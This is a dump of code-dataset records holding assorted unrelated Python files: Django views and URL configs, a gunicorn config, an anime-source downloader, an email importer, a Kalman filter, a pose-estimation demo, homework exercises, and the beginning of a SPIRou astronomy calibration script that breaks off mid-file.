instance.save()\n return JSONResponse(SuccessResponse(returnDictChangeToLanguage(OrgRemarkDetailSerializer(instance).data,lang)))\n except InvestError as err:\n return JSONResponse(InvestErrorResponse(err))\n except Exception:\n catchexcption(request)\n return 
JSONResponse(ExceptionResponse(traceback.format_exc().split('\\n')[-2]))","sub_path":"org/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":24736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"534787391","text":"from multiprocessing import cpu_count\nimport os\n\nport = os.environ.get('PORT')\n\n# bind = '0.0.0.0:443'\nbind = '0.0.0.0:{}'.format(port)\nworkers = 1 # cpu_count() * 2 + 1\ndaemon = False\nthreads = 1\npreload_app = False\nproc_name = 'ci-server'\nworker_class = 'gthread'\n# pidfile = '/application/instacar-back/pid.txt'\n# logfile = '/application/instacar-back/services/backend/results.log'\n# pythonpath = 'app_notifications'\nloglevel = 'info'\n\n# ssl config\n# keyfile = '/app_notifications/example.key'\n# certfile = '/app_notifications/api_instacarshare_com.crt'\n# ca_certs = '/app_notifications/bundle.crt'\n","sub_path":"src/ci/gunicorn_conf.py","file_name":"gunicorn_conf.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"619938340","text":"import logging\nimport warnings\nfrom pathlib import Path\nfrom typing import List, Optional\nfrom urllib.parse import urljoin\n\nimport httpcore\nimport httpx\nfrom pydantic.tools import parse_obj_as\nfrom tenacity import (\n retry,\n before_sleep_log,\n retry_if_exception_type,\n wait_fixed,\n wait_random,\n)\nfrom tqdm import tqdm\n\nfrom main.client import client, get_auth_client\nfrom main.constants import TWIST_URL, ANIME_ENDPOINT, FILES_URL, ONGOING_FILES_URL\nfrom main.schemas import Anime, AnimeDetails, AnimeSource\nfrom main.utils import decrypt\nfrom main.constants import FUZZY_SEARCH_THRESHOLD, FUZZY_SEARCH_MAX_RESULTS\n\nwarnings.simplefilter(\"ignore\")\nfrom fuzzywuzzy import fuzz\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_animes() -> List[Anime]:\n with client:\n r = client.get(url=f\"{TWIST_URL}{ANIME_ENDPOINT}\")\n r.raise_for_status()\n return parse_obj_as(List[Anime], r.json())\n\n\ndef get_anime_slugs() -> List[str]:\n return [anime.slug.slug for anime in get_animes()]\n\n\ndef get_anime_details(anime: Anime) -> AnimeDetails:\n with client:\n url = f\"{TWIST_URL}{ANIME_ENDPOINT}/{anime.slug.slug}\"\n r = client.get(url=url)\n r.raise_for_status()\n anime_details: AnimeDetails = AnimeDetails.parse_obj(r.json())\n return anime_details\n\n\ndef get_sources(anime: Anime) -> List[AnimeSource]:\n anime_details = get_anime_details(anime)\n with client:\n source_key = client.source_key\n url = f\"{TWIST_URL}{ANIME_ENDPOINT}/{anime.slug.slug}/sources\"\n r = client.get(url=url)\n r.raise_for_status()\n sources: List[AnimeSource] = parse_obj_as(List[AnimeSource], r.json())\n # Decrypt and complete source\n domain = ONGOING_FILES_URL if anime_details.ongoing else FILES_URL\n for source in sources:\n source.source = urljoin(\n domain, decrypt(source.source, source_key).replace(\" \", \"%20\")\n )\n return sources\n\n\ndef filter_animes(\n search: str,\n animes: Optional[List[Anime]] = None,\n threshold: int = FUZZY_SEARCH_THRESHOLD,\n limit: int = FUZZY_SEARCH_MAX_RESULTS,\n):\n if animes is None:\n animes = get_animes()\n animes_by_title = dict(\n sorted(((anime.title, anime) for anime in animes), key=lambda x: x[0])\n )\n animes_by_alt_title = dict(\n sorted(\n ((anime.alt_title, anime) for anime in animes if anime.alt_title),\n key=lambda x: x[0],\n )\n )\n selected_animes_with_score_by_id = {}\n for anime in animes_by_title.values():\n score 
= fuzz.token_set_ratio(search.lower(), anime.title.lower())\n if score > threshold:\n selected_animes_with_score_by_id[anime.id] = (score, anime)\n for anime in animes_by_alt_title.values():\n score = fuzz.token_set_ratio(search.lower(), anime.alt_title.lower())\n if score > threshold:\n selected_animes_with_score_by_id[anime.id] = (score, anime)\n return list(\n x[1]\n for x in sorted(\n selected_animes_with_score_by_id.values(),\n key=lambda x: x[0],\n reverse=True,\n )\n )[:limit]\n\n\n@retry(\n reraise=True,\n before_sleep=before_sleep_log(logger, logging.ERROR),\n retry=retry_if_exception_type(httpcore.TimeoutException)\n | retry_if_exception_type(httpx.NetworkError)\n | retry_if_exception_type(httpx.TransportError),\n wait=wait_fixed(2) + wait_random(1, 10),\n)\ndef download_source(source: AnimeSource, filepath: Path):\n with get_auth_client() as new_client:\n with new_client.stream(\n \"GET\",\n source.source,\n headers={**dict(new_client.headers), \"referer\": TWIST_URL},\n ) as response:\n total = int(response.headers.get(\"Content-Length\"))\n with filepath.open(\"wb\") as file:\n with tqdm(\n total=total, unit_scale=True, unit_divisor=1024, unit=\"B\"\n ) as progress:\n num_bytes_downloaded = response.num_bytes_downloaded\n for chunk in response.iter_bytes():\n file.write(chunk)\n progress.update(\n response.num_bytes_downloaded - num_bytes_downloaded\n )\n num_bytes_downloaded = response.num_bytes_downloaded\n","sub_path":"main/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"87210147","text":"__version__ = 8\n\nimport mailbox\nimport ob\nimport os\nimport sys\n\nfrom ob import k\nfrom ob.err import EINIT\nfrom ob.evt import Event\nfrom ob.pst import Persist\n\nbdmonths = ['Bo', 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug',\n 'Sep', 'Oct', 'Nov', 'Dec']\nmonthint = {\n 'Jan': 1,\n 'Feb': 2,\n 'Mar': 3,\n 'Apr': 4,\n 'May': 5,\n 'Jun': 6,\n 'Jul': 7,\n 'Aug': 8,\n 'Sep': 9,\n 'Oct': 10,\n 'Nov': 11,\n 'Dec': 12\n}\n\nclass Email(Persist):\n\n def __init__(self):\n super().__init__()\n self.text = \"\"\n\ndef to_date(date):\n date = date.replace(\"_\", \":\")\n res = date.split()\n ddd = \"\"\n try:\n if \"+\" in res[3]:\n raise ValueError\n if \"-\" in res[3]:\n raise ValueError\n int(res[3])\n ddd = \"{:4}-{:#02}-{:#02} {:6}\".format(res[3], monthint[res[2]], int(res[1]), res[4])\n except (IndexError, KeyError, ValueError):\n try:\n if \"+\" in res[4]:\n raise ValueError\n if \"-\" in res[4]:\n raise ValueError\n int(res[4])\n ddd = \"{:4}-{:#02}-{:02} {:6}\".format(res[4], monthint[res[1]], int(res[2]), res[3])\n except (IndexError, KeyError, ValueError):\n try:\n ddd = \"{:4}-{:#02}-{:02} {:6}\".format(res[2], monthint[res[1]], int(res[0]), res[3])\n except (IndexError, KeyError):\n try:\n ddd = \"{:4}-{:#02}-{:02}\".format(res[2], monthint[res[1]], int(res[0]))\n except (IndexError, KeyError):\n try:\n ddd = \"{:4}-{:#02}\".format(res[2], monthint[res[1]])\n except (IndexError, KeyError):\n try:\n ddd = \"{:4}\".format(res[2])\n except (IndexError, KeyError):\n ddd = \"\"\n return ddd\n\ndef mbox(event):\n if not event.args:\n event.reply(\"mbox \")\n return\n fn = os.path.expanduser(event.args[0])\n event.reply(\"reading from %s\" % fn)\n nr = 0\n if os.path.isdir(fn):\n thing = mailbox.Maildir(fn, create=False)\n elif os.path.isfile(fn):\n thing = mailbox.mbox(fn, create=False)\n else:\n event.reply(\"need a mbox or maildir.\")\n 
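# note (added): detection above is purely path-based (a directory is treated
        # as a Maildir, a regular file as an mbox); anything else is rejected here.
        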
return\n    try:\n        thing.lock()\n    except FileNotFoundError:\n        pass\n    for m in thing:\n        o = Email()\n        ob.update2(o, m)\n        try:\n            sdate = os.sep.join(to_date(o.Date).split())\n        except AttributeError:\n            sdate = None\n        o.text = \"\"\n        for payload in m.walk():\n            if payload.get_content_type() == 'text/plain':\n                o.text += payload.get_payload()\n        o.text = o.text.replace(\"\\\\n\", \"\\n\")\n        if sdate:\n            o.save(stime=sdate)\n        else:\n            o.save()\n        nr += 1\n    if nr:\n        event.reply(\"ok %s\" % nr)\n\ndef email(event):\n    if not event.args:\n        event.reply(\"email \")\n        return\n    a1 = event.args[0]\n    if os.path.exists(a1):\n        mbox(event)\n        return\n    nr = 0\n    s = event.selector\n    s.update({\"From\": event.args[0]})\n    if len(event.args) >= 2:\n        nr = 0\n        for arg in event.args[1:]:\n            if arg.endswith(\"+\"):\n                arg = arg[:-1]  # strip the trailing \"+\" flag\n                event.dkeys.append(\"text\")\n            elif arg.endswith(\"-\"):\n                arg = arg[:-1]  # strip the trailing \"-\" flag\n                event.ignore = \"text\"\n            else:\n                event.dkeys.append(arg)\n            s.update({\"text\": arg})\n        if len(event.args) > 1:\n            if arg in event.dkeys:\n                event.dkeys.remove(arg)\n            if arg in s:\n                del s[arg]\n    event.dkeys.extend([\"From\", \"Subject\"])\n    event.options = event.options + \"t\"\n    nr = 0\n    for o in k.db.find(\"emailbot.Email\", s, event.index, event.delta):\n        event.display(o, \"%-3s\" % str(nr))\n        nr += 1\n","sub_path":"emailbot/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"471102518","text":"n, x = map(int, input().split())\n\ntable_l = [-1 for _ in range(51)]\ntable_p = [-1 for _ in range(51)]\ntable_l[0] = 1\ntable_p[0] = 1\n\nfor i in range(1, 51):\n    table_l[i] = table_l[i-1] * 2 + 3\n    table_p[i] = table_p[i-1] * 2 + 1\n\n\ndef f(level, x):\n    if level == 1:\n        if x == 0 or x == 1:\n            return 0\n        if x == 2:\n            return 1\n        if x == 3:\n            return 2\n        else:\n            return 3\n\n    if table_l[level] == x:\n        return table_p[level]\n\n    if x - 1 <= table_l[level - 1]:\n        return f(level - 1, x - 1)\n\n    if x - 2 == table_l[level - 1]:\n        return table_p[level - 1] + 1\n    if x - 2 > table_l[level - 1]:\n        xx = x - 2 - table_l[level - 1]\n        return table_p[level - 1] + 1 + f(level - 1, xx)\n\n\nprint(f(n, x))\n","sub_path":"atcoder/2018-12-08/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"566226219","text":"from django.conf.urls import patterns, url\nfrom receipt_balancer import views\n\nurlpatterns = patterns('',\n                       url(r'^$', views.index, name='index'),\n                       #url(r'about/$', views.about, name='about'),\n                       url(r'^roommate/(?P[-\\w\\d]+)/$', views.roommate, name='roommate'),\n                       url(r'^add_roommate/$', views.add_roommate, name='add_roommate'),\n                       url(r'^add_receipt/$', views.add_receipt, name='add_receipt')\n                       ,)\n","sub_path":"receipt_balancer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"586755941","text":"import vk\n\nfrom vkBot.settings import *\n\n\ndef send_message(user_id, message, source, attachment=''):\n    if source == 0:  # vk\n        session = vk.Session()\n        api = vk.API(session, v=5.0)\n        api.messages.send(user_id=str(user_id), access_token=vk_token, message=message, attachment=attachment)\n    elif source == 1:  # facebook\n        params = {\n            \"recipient\": {\n                \"id\": str(user_id)\n            },\n            \"message\": {\n                \"text\": message\n            }\n        }\n        import requests\n        headers = {\n            'Content-Type': 
'application/json'\n }\n r = requests.post('https://graph.facebook.com/v2.6/me/messages?access_token=' + fb_token,\n json=params, headers=headers)\n text = r.text\n print('Message facebook response: ')\n print(text)\n params = {\n \"recipient\": {\n \"id\": str(user_id)\n },\n \"message\": {\n \"attachment\": {\n \"type\": \"image\",\n \"payload\": {\n \"url\": attachment\n }\n }\n }\n }\n headers = {\n 'Content-Type': 'application/json'\n }\n r = requests.post('https://graph.facebook.com/v2.6/me/messages?access_token=' + fb_token,\n json=params, headers=headers)\n text = r.text\n print('Attachment facebook response: ')\n print(text)\n\n\ndef vk_get_short_link(long_url):\n session = vk.Session()\n api = vk.API(session=session, v=5.0)\n result = api.utils.getShortLink(url=long_url, access_token=vk_token)\n return result['short_url']","sub_path":"vkBot/API.py","file_name":"API.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"237708350","text":"import numpy\n\ndef kalman(z, z_sigma, Q, dt):\n\n\tsz = (len(z),)\n\n\t# allocate space for arrays\n\txhat=numpy.zeros(sz) # a posteri estimate of x\n\tP=numpy.zeros(sz) # a posteri error estimate\n\txhatminus=numpy.zeros(sz) # a priori estimate of x\n\tPminus=numpy.zeros(sz) # a priori error estimate\n\tK=numpy.zeros(sz) # gain or blending factor\n\n\n\t#extra, for calculated system dynamics\n\tx_dt\t\t\t= numpy.zeros(sz)\t#the measurements derivatives. We use this to decide if we should increase or lower our estimates\n\tx_dt2\t\t\t= numpy.zeros(sz)\t#the measurements derivatives. We use this to decide if we should increase or lower our estimates\n\tz_dt\t\t\t= numpy.zeros(sz)\t#the measurements derivatives. We use this to decide if we should increase or lower our estimates\n\tz_dt2\t\t\t= numpy.zeros(sz)\t#the measurements derivatives. 
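(second difference of the measurements z)\n\t# Added note (hedged): the a-priori step xhatminus = xhat + (x_dt + x_dt2)*dt\n\t# is a constant-acceleration extrapolation; Q inflates Pminus every step,\n\t# while R = z_sigma**2 sets how strongly the gain K pulls xhat toward z.\n\t#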
We use this to decide if we should increase or lower our estimates\n\tx_integral \t\t= numpy.zeros(sz)\n\txhat_integral \t= numpy.zeros(sz)\n\tz_integral \t\t= numpy.zeros(sz)\n\txhat_int_error\t= numpy.zeros(sz)\n\tz_int_error\t\t= numpy.zeros(sz)\n\n\tR = z_sigma**2 # estimate of measurement variance, change to see effect\n\n\t# intial guesses\n\txhat[0] = z[0]\n\tP[0] = 1e-1\n\n\tn_iter = len(z)\n\tfor k in range(1,n_iter):\n\t # time update\t\n\t xhatminus[k] \t= (xhat[k-1]) + (x_dt[k-1]+x_dt2[k-1])*dt\n\t Pminus[k] \t\t= P[k-1]+Q\n\n\t # measurement update\n\t K[k] \t\t= Pminus[k]/( Pminus[k]+R )\n\t xhat[k] \t= xhatminus[k]\t+\tK[k]*(z[k]-xhatminus[k])\n\t P[k] \t\t= (1-K[k])*Pminus[k]\n\n\t x_dt[k] \t= (xhat[k] - xhat[k-1])\t\t#first derivative\n\t x_dt2[k] \t= (x_dt[k] - x_dt[k-1])\t\t#second derivative\n\t z_dt[k] \t= (z[k] \t- z[k-1])\t\t#first derivative\n\t z_dt2[k] \t= (z_dt[k] - z_dt[k-1])\t\t#second derivative\n\n\t #x_integral[k] \t\t=\tx_integral[k-1]\t\t+ x[k]*dt \n\t xhat_integral[k] \t=\txhat_integral[k-1]\t+ xhat[k]*dt\n\t z_integral[k]\t\t=\tz_integral[k-1]\t\t+ z[k]*dt\n\t \n\t #xhat_int_error[k]\t=\tx_integral[k] - xhat_integral[k]\n\t #z_int_error[k]\t\t=\tx_integral[k] - z_integral[k]\n\n\treturn (xhat, xhat_integral, z_integral)\t ","sub_path":"kalman_func.py","file_name":"kalman_func.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"349485215","text":"from p078.coins.cache import get_piles_count\nfrom .helpers import cm\n\n\ndef sum_dependencies(deps):\n return sum(get_piles_count(**cm(dep)) for dep in deps)\n\n\ndef build_factor_dependencies(coins, factor, max=None):\n max = max if max is not None else coins\n\n if coins == factor:\n return [(0, 0)]\n\n min_for_factor = coins // (factor + 1)\n max_for_factor = coins // factor\n\n if min_for_factor == max_for_factor:\n return []\n\n # print(\n # \"The max/min for factor of {factor} is {max}/{min}.\".format(\n # factor=factor, max=max_for_factor, min=min_for_factor\n # )\n # )\n\n factor_deps = []\n remainder = coins % factor\n\n start = max_for_factor - min(max, max_for_factor)\n\n for i in range(start, max_for_factor - min_for_factor):\n size = remainder + i * factor\n factor_deps.append((size, size))\n\n # should_include = size + factor + max >= coins\n # if should_include:\n # else:\n # print(\"excluded\", size, factor, max, coins)\n\n next_max_size = max_for_factor - i - 1\n\n for j in range(1, factor):\n remaining_coins = coins + i * j - j * max_for_factor\n factor_deps.append((remaining_coins, next_max_size))\n\n # print(factor, factor_deps)\n\n return factor_deps\n\n\ndef build_dependencies(coins, max=None):\n max = max or coins\n deps = []\n\n for factor in range(1, coins + 1):\n factor_deps = build_factor_dependencies(coins, factor, max=max)\n deps += factor_deps\n\n return deps\n\n\ndef build_dependencies_slowly(coins, max):\n # populate dependencies\n current_size_values = range(0, coins, max)\n dependencies = set()\n\n if coins % max == 0:\n dependencies.add((0, 0))\n for i in current_size_values:\n if coins - i >= max - 1:\n dependencies.add((coins - i, max - 1))\n else:\n # don't want dependencies such as (2, 21) when that's equivalent to (2, 2)\n dependencies.add((coins - i, coins - i))\n\n return dependencies\n\n\ndef is_dirty(dep):\n (coins, max) = dep\n return coins != 
max\n","sub_path":"78/p078/coins/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"528298029","text":"from data_source import GREEN, WHITE, HELL_TURQUOIS, DARK_TURQUOIS, RED, SHEN, SHU, BLACK, YELLOW\nfrom Usecases import *\n\nTEA_DESCRIPTION = {\n GREEN: \"Зеленый чай самый бод��ящий\",\n WHITE: \"Белый - гербарий\",\n HELL_TURQUOIS: \"Светлый улун собирают в горах\",\n DARK_TURQUOIS: \"Темный улун любит Миша\",\n RED: \"Красный лучше пить осенью\",\n SHEN: \"Чем старше шен - тем он вкусней\",\n SHU: \"Шу Пуэр любит Лера\",\n BLACK: \"На черном чае можно увидеть плесень\",\n YELLOW: \"Желтый - очень дорогой\"\n}\n\n\ndef handle(message: str):\n text = message.lower()\n return TEA_DESCRIPTION[text]\n\n\npredicate = make_word_in_list_predicate([GREEN, WHITE, HELL_TURQUOIS, DARK_TURQUOIS, RED, SHEN, SHU, BLACK, YELLOW])\n\n\ndef commands():\n return None\n\n\ndef markup():\n return None\n","sub_path":"Usecases/category_description.py","file_name":"category_description.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"10774576","text":"from django.urls import path, re_path\n\nfrom .views import *\n\napp_name = 'foreground'\nurlpatterns = [\n re_path(r\"article/(?P\\d+)/(#.+)?\", article, name='article'),\n path(\"type_articles/\", type_articles, name='type_articles'),\n path(\"tag_articles/\", tag_articles, name='tag_articles'),\n path(\"commit_comment/\", commit_comment, name='comment'),\n]\n","sub_path":"foreground/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"114376786","text":"import cv2\nimport mediapipe as mp\nimport time\n\n'''for more info, visit:\nhttps://google.github.io/mediapipe/solutions/pose.html'''\n\ncap = cv2.VideoCapture('../PoseVideos/6.mp4')\n\ncTime=0\npTime=0\n\nmpPose = mp.solutions.pose #define the function path to .pose\npose = mpPose.Pose() #create an object from Pose()\nmpDraw = mp.solutions.drawing_utils\n\n\n\nwhile True:\n success, img = cap.read()\n #resize image to fit\n img = cv2.resize(img,(512,342),interpolation=cv2.INTER_AREA)\n\n\n #convert img\n imgRGB = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n result = pose.process(imgRGB)\n #print(result.pose_landmarks) #print out attributes for landmarks\n\n #draw pose frame\n if result.pose_landmarks:\n mpDraw.draw_landmarks(img,result.pose_landmarks,mpPose.POSE_CONNECTIONS)\n\n #get positional data\n for id, lm in enumerate(result.pose_landmarks.landmark):\n #print(id,lm)\n h, w, c = img.shape #height, width, channels\n cx, cy = int(lm.x*w), int(lm.y*h) #center width, center height\n \n if id ==0: #first landmark\n cv2.circle(img, (cx,cy), 5, (255,0,255), cv2.FILLED)\n\n\n\n #determine fps\n cTime = time.time()\n fps = 1/(cTime-pTime)\n pTime=cTime\n\n #display fps\n cv2.putText(img,str(int(fps)),(10,70),cv2.FONT_HERSHEY_PLAIN,3,\n (255,0,255),3)\n\n #display image\n cv2.imshow('Video',img)\n\n #if the d key is pressed, kill screen\n if cv2.waitKey(1) & 0xFF==ord('d'):\n break\n\ncap.release()\ncv2.destroyAllWindows()","sub_path":"Lesson 4 - Hand and Body 
Tracking/2_1-pose_estimation_basics.py","file_name":"2_1-pose_estimation_basics.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"152149893","text":"# Enter a number between 1 and 20, save this value to number variable.\n# If number is greater than 0 and less than or equal to 7, save the number * 10 to result_1.\n# If number is greater than 7 and less than or equal to 15, save the result of floor division of the number divided by\n# 3 to result_1 variable\n# If number is greater than 15 and less than or equal to 20, save the number raised to the power 3 to result_1\n# Else save the text \"Wrong value\" to result_1\nresult_1 = None\nnumber = int(input(\"Enter a number between 1 and 20 \"))\nif number > 0 and number <= 7:\n    result_1 = number * 10\nelif number > 7 and number <= 15:\n    result_1 = number // 3\nelif number > 15 and number <= 20:\n    result_1 = pow(number, 3)\nelse:\n    result_1 = \"Wrong value\"\n\nprint(result_1)\n\n\n\n# Enter two numbers between 1 and 10, save these values to number_1 and number_2 variables.\n# If number_1 and number_2 are greater than 0 and less than or equal to 5 save the product of their multiplication\n# to result_2\n# If one of the variables (number_1 or number_2) is greater than 5 and less than or equal to 10, but the other isn't,\n# then save the sum of the two numbers to result_2\n# If both numbers are greater than 5 and less than or equal to 10, multiply their sum by 3 and save it to result_2\n# Else save the text \"Wrong values, try again\" to result_2\n\nnumber_1 = int(input(\"Enter a number between 1 and 10 \"))\nnumber_2 = int(input(\"Enter a number between 1 and 10 \"))\nresult_2 = None\nif 0 < number_1 <= 5 and 0 < number_2 <= 5:\n    result_2 = number_1 * number_2\nelif 5 < number_1 <= 10 and 5 < number_2 <= 10:\n    # both in (5, 10]: this case must be checked before the one-sided case below\n    result_2 = 3 * (number_1 + number_2)\nelif 5 < number_1 <= 10 or 5 < number_2 <= 10:\n    result_2 = number_1 + number_2\nelse:\n    result_2 = \"Wrong values, try again\"\nprint(result_2)\n\n\n\n# Enter your first name and save it to first_name variable,\n# then Enter last name and save it to last_name\n# If first_name or last_name are shorter than 6 characters, save a full name (with a space between) to result_3\n# Else save first_name to result_3 as many times as length of last_name value\nresult_3 = None\nfirst_name = input(\"Enter your first name \")\nlast_name = input(\"Enter your last name \")\nif len(first_name) < 6 or len(last_name) < 6:\n    result_3 = first_name + \" \" + last_name\nelse:\n    result_3 = len(last_name) * first_name\n\nprint(result_3)\n\n# Enter a random number. Save this value to random_number variable\n# If this number is less than 10 or greater than 99, save the text \"Please, put in a number between 10 and 99\" to result_4\n# If a number doesn't meet the first condition, find the remainder of random_number divided by 2.\n# If it is 0, save the text \"Even number\" to result_4, else save the message \"Odd number\"\nresult_4 = None\nrandom_number = int(input(\"Enter a random number \"))\nif random_number < 10 or random_number > 99:\n    result_4 = \"Please, put in a number between 10 and 99\"\nelif random_number % 2 == 0:\n    result_4 = \"Even number\"\nelse:\n    result_4 = \"Odd number\"\nprint(result_4)\n","sub_path":"lesson_2/homework_2_2.py","file_name":"homework_2_2.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"245479801","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\ncal_SLIT_spirou.py [night_directory] [files]\n\nFabry-Perot exposures in which the three fibres are simultaneously fed by light\nfrom the Fabry-Perot filter. Each exposure is used to build the slit\norientation. Finds the tilt of the orders.\n\nCreated on 2017-11-06 11:32\n\n@author: cook\n\nLast modified: 2017-12-11 at 15:09\n\nUp-to-date with cal_SLIT_spirou AT-4 V47\n\"\"\"\nfrom __future__ import division\nimport numpy as np\nimport os\nimport warnings\n\nfrom SpirouDRS import spirouDB\nfrom SpirouDRS import spirouConfig\nfrom SpirouDRS import spirouCore\nfrom SpirouDRS import spirouImage\nfrom SpirouDRS import spirouLOCOR\nfrom SpirouDRS import spirouStartup\nfrom SpirouDRS import spirouTHORCA\nfrom SpirouDRS import spirouEXTOR\n\n\n# =============================================================================\n# Define variables\n# =============================================================================\n# Name of program\n__NAME__ = 'cal_shape_master_spirou.py'\n# Get version and author\n__version__ = spirouConfig.Constants.VERSION()\n__author__ = spirouConfig.Constants.AUTHORS()\n__date__ = spirouConfig.Constants.LATEST_EDIT()\n__release__ = spirouConfig.Constants.RELEASE()\n__args__ = ['night_name', 'hcfile', 'fpfile']\n__required__ = [True, True, True]\n# Get Logging function\nWLOG = spirouCore.wlog\n# Get plotting functions\nsPlt = spirouCore.sPlt\n# Get parameter dictionary\nParamDict = spirouConfig.ParamDict\n# force plot off\nPLOT_PER_ORDER = False\n\n\n# =============================================================================\n# Define functions\n# =============================================================================\ndef main(night_name=None, hcfile=None, fpfiles=None):\n    \"\"\"\n    cal_SLIT_spirou.py main function, if night_name and files are None uses\n    arguments from run time i.e.:\n        cal_SLIT_spirou.py [night_directory] [files]\n\n    :param night_name: string or None, the folder within data raw directory\n                       containing files (also reduced directory) i.e.\n                       /data/raw/20170710 would be \"20170710\" but\n                       /data/raw/AT5/20180409 would be \"AT5/20180409\"\n    :param files: string, list or None, the list of files to use for\n                  arg_file_names and fitsfilename\n                  (if None assumes arg_file_names was set from run time)\n\n    :return ll: dictionary, containing all the local variables defined in\n                main\n    \"\"\"\n    # ----------------------------------------------------------------------\n    # Set up\n    # ----------------------------------------------------------------------\n    # get parameters from config files/run time args/load paths + calibdb\n    p = 
spirouStartup.Begin(recipe=__NAME__)\n if hcfile is None or fpfiles is None:\n names, types = ['hcfile', 'fpfiles'], [str, str]\n customargs = spirouStartup.GetCustomFromRuntime(p, [0, 1], types, names,\n last_multi=True)\n else:\n customargs = dict(hcfile=hcfile, fpfile=fpfiles)\n\n # get parameters from configuration files and run time arguments\n p = spirouStartup.LoadArguments(p, night_name, customargs=customargs,\n mainfitsfile='fpfiles')\n\n # ----------------------------------------------------------------------\n # Construct reference filename and get fiber type\n # ----------------------------------------------------------------------\n p, hcfitsfilename = spirouStartup.SingleFileSetup(p, filename=p['HCFILE'])\n p, fpfitsfiles = spirouStartup.MultiFileSetup(p, files=p['FPFILES'])\n # set fiber (it doesn't matter with the 2D image but we need this to get\n # the lamp type for FPFILES and HCFILES, AB == C\n p['FIBER'] = 'AB'\n p['FIB_TYP'] = [p['FIBER']]\n fsource = __NAME__ + '/main()'\n p.set_sources(['FIBER', 'FIB_TYP'], fsource)\n\n # ----------------------------------------------------------------------\n # Once we have checked the e2dsfile we can load calibDB\n # ----------------------------------------------------------------------\n # as we have custom arguments need to load the calibration database\n p = spirouStartup.LoadCalibDB(p)\n\n # add a force plot off\n p['PLOT_PER_ORDER'] = PLOT_PER_ORDER\n p.set_source('PLOT_PER_ORDER', __NAME__ + '.main()')\n\n # ----------------------------------------------------------------------\n # Read FP and HC files\n # ----------------------------------------------------------------------\n # read input fp and hc data\n rkwargs = dict(filename=fpfitsfiles[0], filenames=fpfitsfiles[1:],\n framemath='add')\n p, fpdata, fphdr = spirouImage.ReadImageAndCombine(p, **rkwargs)\n\n hcdata, hchdr, _, _ = spirouImage.ReadImage(p, hcfitsfilename)\n\n # add data and hdr to loc\n loc = ParamDict()\n loc['HCDATA'], loc['HCHDR'] = hcdata, hchdr\n loc['FPDATA'], loc['FPHDR'] = fpdata, fphdr\n # set the source\n sources = ['HCDATA', 'HCHDR']\n loc.set_sources(sources, 'spirouImage.ReadImage()')\n sources = ['FPDATA', 'FPHDR']\n loc.set_sources(sources, 'spirouImage.ReadImage()')\n\n # ---------------------------------------------------------------------\n # fix for un-preprocessed files\n # ----------------------------------------------------------------------\n hcdata = spirouImage.FixNonPreProcess(p, hcdata)\n fpdata = spirouImage.FixNonPreProcess(p, fpdata)\n\n # ----------------------------------------------------------------------\n # Once we have checked the e2dsfile we can load calibDB\n # ----------------------------------------------------------------------\n # as we have custom arguments need to load the calibration database\n p = spirouStartup.LoadCalibDB(p)\n\n # add a force plot off\n p['PLOT_PER_ORDER'] = PLOT_PER_ORDER\n p.set_source('PLOT_PER_ORDER', __NAME__ + '.main()')\n\n # ----------------------------------------------------------------------\n # Get basic image properties for reference file\n # ----------------------------------------------------------------------\n # get sig det value\n p = spirouImage.GetSigdet(p, fphdr, name='sigdet')\n # get exposure time\n p = spirouImage.GetExpTime(p, fphdr, name='exptime')\n # get gain\n p = spirouImage.GetGain(p, fphdr, name='gain')\n # get lamp parameters\n p = spirouTHORCA.GetLampParams(p, hchdr)\n # get FP_FP DPRTYPE\n p = spirouImage.ReadParam(p, fphdr, 'KW_DPRTYPE', 'DPRTYPE', 
